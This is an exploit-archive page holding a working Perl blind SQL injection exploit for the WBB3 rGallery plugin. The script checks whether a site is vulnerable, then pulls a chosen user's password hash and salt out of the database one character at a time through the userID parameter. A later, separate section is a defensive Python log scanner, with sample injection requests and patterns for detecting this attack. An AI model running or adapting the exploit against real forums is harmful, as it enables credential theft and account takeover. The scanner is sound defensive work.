WBB3 rGallery 1.2.3 (UserGallery) Blind SQL Injection Exploit
Source: vfocus.net  Author: vfocus  Published: 2009-03-24
```perl
#!/usr/bin/perl -w

use strict;
use LWP::Simple;

$| = 1;   # unbuffered STDOUT so each recovered character is shown as soon as it is found

print q {
#############################
## WBB3 Blind SQL-Injector ##
#### Exploit in rGallery ####
###### by Invisibility ######
#############################
\\\    Special greetz to     #
//  Katharsis/**/nobody     #
\\\    Gunner/**/Cheese      #
//          Thx ;)          #
#############################


};

if (@ARGV < 3) {
 print "Usage: wbb3sploit.pl [url] [user id] [User Gallery userID] \nExample: wbb3sploit.pl www.target.com 1 5\n";
 print "[User Gallery UserID] has to be the ID of a User, who has got pictures.\nExample: www.target.com/index.php?page=RGalleryUserGallery&userID=5\n";
 exit;
}

my $url   = shift;   # host of the WBB3 installation
my $uid   = shift;   # userID of the account whose password hash / salt is read
my $galid = shift;   # userID of a gallery that has pictures (a page that renders differently when the injected condition is true)

my $prefix;

# Hex alphabet only: the WCF password hash and salt are stored as hexadecimal strings
my @charset = ('a','b','c','d','e','f','1','2','3','4','5','6','7','8','9','0');

print "~ Is it vulnerable?...\n";

# A lone single quote in the unfiltered userID parameter breaks the SQL statement
# and, on an unpatched installation, surfaces a PHP or database error in the response
my $chreq = get("http://".$url."/index.php?page=RGalleryUserGallery&userID='");

if (($chreq =~ m/Fatal error/i) || ($chreq =~ m/Invalid SQL/i)) {
 print "Nice, seems to be vulnerable!\n";
} else {
 print "Seems to be patched, sorry\n";
 exit;
}

print "~ Checking Prefix...\n";

# Note: this pattern contains no capture group, so $1 is not set by the match;
# in practice the table prefix falls back to the default 'wcf1_' below
if ($chreq =~ m/_wcf/i) {
 print "~ Found Prefix '$1'\n";
 $prefix = $1;
} else {
 print "~ Can't find prefix, using 'wcf1_'\n";
 $prefix = "wcf1_";
}

print "~ Exploiting...\n";
print "~^~ Hash: ";

my $counter     = 1;
my $countersalt = 1;

# Boolean-blind extraction: one request per candidate character and position.
# /**/ replaces spaces in the injected SQL. A false condition makes the gallery
# page print its German "Keine ..." (no pictures) message; a true condition
# renders the gallery normally. The hash is 40 hex characters, hence < 41.
# If no character in @charset matches a position, the loop never advances.
while ($counter < 41) {
 foreach (@charset) {
  my $ascode = ord($_);
  my $result = get("http://".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/password/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$counter."))=".$ascode."");

  if (length($result) != 0) {
   if ($result !~ m/Keine/) {
    print chr($ascode);
    $counter++;
   }
  }
 }
}

# Only read the salt if the column exists and is non-empty for this user
my $saltcheck = get("http://".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),1))>0");
if ($saltcheck !~ m/Keine/) {
 print "\n~^~ Salt: ";
 while ($countersalt < 41) {
  foreach (@charset) {
   my $ascodesalt = ord($_);
   my $resultsalt = get("http://".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$countersalt."))=".$ascodesalt."");

   if (length($resultsalt) != 0) {
    if ($resultsalt !~ m/Keine/) {
     print chr($ascodesalt);
     $countersalt++;
    }
   }
  }
 }
}
print "\n~ Done! Exploit by Invisibility\n";

# [2009-03-23]
```
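A defender-side complement, added here and not part of the original exploit listing: a small Python scanner that parses constructed access-log lines (common log format, invented addresses) and flags the request shape the script above produces, a numeric userID followed by a boolean-blind `AND ascii(substring(...))` tail with `/**/` standing in for spaces, plus the single-quote error probe. The sample lines and the `inspect_user_id`/`scan` helper names are my own.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample lines in common log format (not real server records).
# Lines 1-2 mirror the exploit's requests (raw and percent-encoded), line 3 is a
# normal gallery view, line 4 is the single-quote probe the script sends first.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Mar/2009:10:15:01 +0000] "GET /index.php?page=RGalleryUserGallery&userID=5/**/AND/**/ascii(substring((SELECT/**/password/**/FROM/**/wcf1_user/**/WHERE/**/userid=1),1))=97 HTTP/1.1" 200 4312
203.0.113.7 - - [24/Mar/2009:10:15:02 +0000] "GET /index.php?page=RGalleryUserGallery&userID=5%2F%2A%2A%2FAND%2F%2A%2A%2Fascii%28substring%28%28SELECT%2F%2A%2A%2Fsalt%2F%2A%2A%2FFROM%2F%2A%2A%2Fwcf1_user%29%2C1%29%29%3E0 HTTP/1.1" 200 4312
198.51.100.9 - - [24/Mar/2009:10:16:44 +0000] "GET /index.php?page=RGalleryUserGallery&userID=5 HTTP/1.1" 200 4312
198.51.100.9 - - [24/Mar/2009:10:16:50 +0000] "GET /index.php?page=RGalleryUserGallery&userID=' HTTP/1.1" 200 812
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')

# Whitespace or an inline comment: the exploit writes /**/ wherever SQL needs a space
SEP = r'(?:/\*.*?\*/|\s)+'
# Integer value followed by a boolean-blind character-extraction tail
BLIND_TAIL = re.compile(r'^[0-9]+' + SEP + r'AND' + SEP + r'ascii\s*\(\s*substring', re.I)


def inspect_user_id(value):
    """Classify one percent-decoded userID value; None means it looks like a plain id."""
    if re.fullmatch(r'[0-9]+', value):
        return None
    if BLIND_TAIL.match(value):
        return 'boolean-blind tail on numeric userID'
    return 'non-numeric userID'          # e.g. the single-quote error probe


def scan(log_text):
    """Return (client, status, label) for every request whose userID parameter is suspicious."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs percent-decodes values, so encoded and raw payloads are inspected alike
        params = parse_qs(urlparse(m['target']).query, keep_blank_values=True)
        label = inspect_user_id(params.get('userID', [''])[0])
        if label:
            findings.append((m['ip'], int(m['status']), label))
    return findings


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because the script needs up to 16 requests per recovered character, the same client repeating this pattern against one userID within seconds is the stronger signal; the status code alone is not, since the page renders 200 for both true and false conditions.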

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CloneCD/DVD (ElbyCDIO.sys < 6.
·SuperNews 1.5 (valor.php notic
·Racer 0.5.3b5 Remote Stack Buf
·Sysax Multi Server 4.3 Remote
·BS.Player 2.34 (.bsl) Universa
·Orbit Downloader 2.8.7 Arbitra
·BS.Player <= 2.34 Build 980 (.
·X-BLC 0.2.0 (get_read.php sect
·POP Peeper 3.4.0.0 (From) Remo
·FreeBSD 7.x (Dumping Environme
·Hannon Hill Cascade Server Com
·Gigaset SE461 WiMAX router Rem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved